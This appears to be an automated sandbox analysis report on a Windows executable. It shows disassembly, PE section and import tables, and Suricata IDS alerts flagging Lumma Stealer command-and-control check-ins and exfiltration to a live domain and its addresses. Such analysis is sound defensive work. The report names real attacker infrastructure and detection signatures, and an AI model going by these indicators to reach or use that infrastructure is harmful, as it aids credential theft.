mov ecx, eax
cmp ecx, edi
jne 00007EFFBCBFFE99h
mov ecx, BB40E64Fh
jmp 00007EFFBCBFFEA0h
test esi, ecx
jne 00007EFFBCBFFE9Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [004307C0h], ecx
not ecx
pop edi
mov dword ptr [00430800h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0042E8F8h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0042E8B0h]
xor dword ptr [ebp-04h], eax
call dword ptr [0042E8ACh]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0042E940h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00431AB0h
call dword ptr [0042E918h]
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov al, 01h
ret
push 00030000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e6d0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x35000	0xe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc9800	0x2628	.BSS
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x36000	0x1b9c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2a9a8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26e40	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e84c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x247fa	0x24800	b135cf9668d8a70b51fd4c459fb035bf	False	0.5549349850171232	data	6.561271665586601	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0x9f14	0xa000	87c5c6312d66ce557738ea7321694150	False	0.4290283203125	DOS executable (COM)	4.923021283143106	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x30000	0x2278	0x1600	7c5c184c1d21197b7c3ea737bb7ce3bb	False	0.39506392045454547	data	4.583345807041613	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CODE	0x33000	0x4	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x34000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x35000	0xe8	0x200	c23dec9445c3ffba4b3e55bbbe0cebde	False	0.306640625	data	2.344915704357875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x36000	0x1b9c	0x1c00	e64b1e55f23b9808d12a59ad4d38544a	False	0.7752511160714286	data	6.540312202227692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x38000	0x4b800	0x4b800	9ad37d9b1d74e0f82e8e2c1c64c0c8af	False	1.0003265987168874	data	7.999500592046876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.BSS	0x84000	0x4b800	0x4b800	9ad37d9b1d74e0f82e8e2c1c64c0c8af	False	1.0003265987168874	data	7.999500592046876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x35060	0x87	XML 1.0 document, ASCII text	English	United States	0.8222222222222222

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObject, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-01T22:04:57.123034+0100	2058656	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)	1	192.168.2.6	64545	1.1.1.1	53	UDP
2025-01-01T22:04:57.607657+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49712	104.21.32.1	443	TCP
2025-01-01T22:04:57.607657+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49712	104.21.32.1	443	TCP
2025-01-01T22:04:58.143694+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49712	104.21.32.1	443	TCP
2025-01-01T22:04:58.143694+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49712	104.21.32.1	443	TCP
2025-01-01T22:04:58.679432+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49713	104.21.32.1	443	TCP
2025-01-01T22:04:58.679432+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49713	104.21.32.1	443	TCP
2025-01-01T22:04:59.155272+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49713	104.21.32.1	443	TCP
2025-01-01T22:04:59.155272+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49713	104.21.32.1	443	TCP
2025-01-01T22:04:59.945904+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49714	104.21.32.1	443	TCP
2025-01-01T22:04:59.945904+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49714	104.21.32.1	443	TCP
2025-01-01T22:05:01.080623+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49715	104.21.32.1	443	TCP
2025-01-01T22:05:01.080623+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49715	104.21.32.1	443	TCP
2025-01-01T22:05:02.222016+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49717	104.21.32.1	443	TCP
2025-01-01T22:05:02.222016+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49717	104.21.32.1	443	TCP
2025-01-01T22:05:04.498341+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49718	104.21.32.1	443	TCP
2025-01-01T22:05:04.498341+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49718	104.21.32.1	443	TCP
2025-01-01T22:05:04.933530+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49718	104.21.32.1	443	TCP
2025-01-01T22:05:05.841345+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49720	104.21.32.1	443	TCP
2025-01-01T22:05:05.841345+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49720	104.21.32.1	443	TCP
2025-01-01T22:05:08.033859+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49736	104.21.32.1	443	TCP
2025-01-01T22:05:08.033859+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49736	104.21.32.1	443	TCP
2025-01-01T22:05:08.503939+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49736	104.21.32.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 22:04:57.141161919 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:57.141205072 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:57.141273975 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:57.144129992 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:57.144150972 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:57.607507944 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:57.607656956 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:57.616532087 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:57.616548061 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:57.616774082 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:57.666836023 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:57.715451002 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:57.715488911 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:57.715635061 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.143702984 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.143791914 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.143846035 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.145714045 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.145736933 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.145749092 CET	49712	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.145755053 CET	443	49712	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.208794117 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.208842039 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.208910942 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.220684052 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.220714092 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.679351091 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.679431915 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.681804895 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.681828976 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.682056904 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:58.684286118 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.684366941 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:58.684386015 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155289888 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155349970 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155380964 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155407906 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155452967 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155481100 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155503988 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.155528069 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155541897 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.155738115 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155764103 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155783892 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.155786991 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155803919 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.155838013 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.159970999 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.160049915 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.242549896 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.242599964 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.242625952 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.242722988 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.242734909 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.242974997 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.243025064 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.243041039 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.243056059 CET	49713	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.243061066 CET	443	49713	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.488111973 CET	49714	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.488156080 CET	443	49714	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.488250971 CET	49714	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.488595009 CET	49714	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.488607883 CET	443	49714	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.945765972 CET	443	49714	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.945904016 CET	49714	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.947271109 CET	49714	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.947290897 CET	443	49714	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.947524071 CET	443	49714	104.21.32.1	192.168.2.6
Jan 1, 2025 22:04:59.948836088 CET	49714	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.948983908 CET	49714	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:04:59.949035883 CET	443	49714	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:00.514718056 CET	443	49714	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:00.514807940 CET	443	49714	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:00.514883041 CET	49714	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:00.515080929 CET	49714	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:00.515100956 CET	443	49714	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:00.620748997 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:00.620805025 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:00.620914936 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:00.621349096 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:00.621361971 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.080446959 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.080622911 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.082247972 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.082268953 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.082511902 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.083724976 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.083849907 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.083879948 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.083940029 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.131342888 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.572092056 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.572196007 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.572326899 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.572526932 CET	49715	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.572546005 CET	443	49715	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.758465052 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.758497953 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:01.758565903 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.758945942 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:01.758955002 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:02.221824884 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:02.222016096 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:02.223598957 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:02.223611116 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:02.223851919 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:02.225168943 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:02.225357056 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:02.225392103 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:02.225482941 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:02.225491047 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:02.804852009 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:02.804965973 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:02.805022955 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:02.805371046 CET	49717	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:02.805386066 CET	443	49717	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:04.031783104 CET	49718	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:04.031840086 CET	443	49718	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:04.031924009 CET	49718	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:04.032331944 CET	49718	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:04.032349110 CET	443	49718	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:04.498105049 CET	443	49718	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:04.498341084 CET	49718	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:04.499821901 CET	49718	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:04.499840021 CET	443	49718	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:04.500087976 CET	443	49718	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:04.502446890 CET	49718	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:04.502563000 CET	49718	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:04.502571106 CET	443	49718	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:04.933545113 CET	443	49718	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:04.933659077 CET	443	49718	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:04.933820963 CET	49718	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:04.933959961 CET	49718	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:04.933978081 CET	443	49718	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.389291048 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.389334917 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.389447927 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.389786005 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.389801979 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.841263056 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.841345072 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.842871904 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.842888117 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.843116045 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.885652065 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.896584034 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.897423983 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.897449970 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.897557020 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.897586107 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.897680998 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.897696972 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.897802114 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.897836924 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.897974968 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.898008108 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.898144007 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.898171902 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.907521963 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.907668114 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.907696009 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.907715082 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.907743931 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.907816887 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.907852888 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.907876015 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.912355900 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.912496090 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.912530899 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:05.912556887 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.912594080 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:05.912992001 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:07.540271997 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:07.540381908 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:07.540445089 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:07.540580034 CET	49720	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:07.540599108 CET	443	49720	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:07.558578014 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:07.558619022 CET	443	49736	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:07.558695078 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:07.559012890 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:07.559026003 CET	443	49736	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:08.033792973 CET	443	49736	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:08.033859015 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:08.035224915 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:08.035233974 CET	443	49736	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:08.035475016 CET	443	49736	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:08.036554098 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:08.036576033 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:08.036608934 CET	443	49736	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:08.503876925 CET	443	49736	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:08.504015923 CET	443	49736	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:08.504070044 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:08.504194021 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:08.504209995 CET	443	49736	104.21.32.1	192.168.2.6
Jan 1, 2025 22:05:08.504240036 CET	49736	443	192.168.2.6	104.21.32.1
Jan 1, 2025 22:05:08.504245043 CET	443	49736	104.21.32.1	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 22:04:57.123034000 CET	64545	53	192.168.2.6	1.1.1.1
Jan 1, 2025 22:04:57.135765076 CET	53	64545	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 22:04:57.123034000 CET	192.168.2.6	1.1.1.1	0x575	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 22:04:57.135765076 CET	1.1.1.1	192.168.2.6	0x575	No error (0)	fancywaxxers.shop	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:04:57.135765076 CET	1.1.1.1	192.168.2.6	0x575	No error (0)	fancywaxxers.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:04:57.135765076 CET	1.1.1.1	192.168.2.6	0x575	No error (0)	fancywaxxers.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:04:57.135765076 CET	1.1.1.1	192.168.2.6	0x575	No error (0)	fancywaxxers.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:04:57.135765076 CET	1.1.1.1	192.168.2.6	0x575	No error (0)	fancywaxxers.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
